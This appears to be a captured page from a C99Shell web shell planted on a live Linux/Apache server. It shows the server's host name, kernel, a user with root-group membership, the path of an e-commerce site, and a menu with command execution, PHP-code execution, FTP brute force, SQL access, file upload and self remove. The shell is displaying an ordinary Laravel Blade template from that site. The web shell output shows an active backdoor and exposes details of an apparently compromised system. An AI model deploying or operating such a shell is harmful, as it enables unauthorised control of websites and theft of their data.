!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/resources/views/frontend/partials/   drwxr-xr-x
Free 29.18 GB of 117.98 GB (24.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     topcategories.blade.php (1.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<section class="top-categories my-3 sm-margin-slider">
  <div class="flex-wrapper title-row top-categories-section-border">
    <div class="cust_left pb-1">
      <div class="short-intro">
        <div class="heading-lg top-categories-title">{{ __('homepage')['label_category'] }}</div>
        <!-- <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy.</p> -->
      </div>
    </div>
    <div class="cust_right">
      <a href="{{route('category.all')}}" class="view_all">{{ __('homepage')['view_all_cat'] }} <i class="fas fa-chevron-right mx-2"></i> </a>
    </div>
  </div>

  <div class="top-categories mt-3">
    <ul class="categories-js slick-arrow">
      @foreach($data['topCategory'] as $key=>$value)
        <li>
          <a href="{{ route('category.products',['id' => $value['category_id']]) }}" class="catebox top-categories-sections">
            <div class="cate-img gray-circle">
              <img src="{{asset('uploads')}}/category/{{$value['image']}}" alt="" title="" />
            </div>
          </a>
          <div class="cate-info cate-info d-flex justify-content-center">
            <div class="heading-xs">{{isset($value['category_description']['name'])?$value['category_description']['name']:''}}</div>
          </div>
        </li>
      @endforeach
    </ul>
  </div>

</section>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--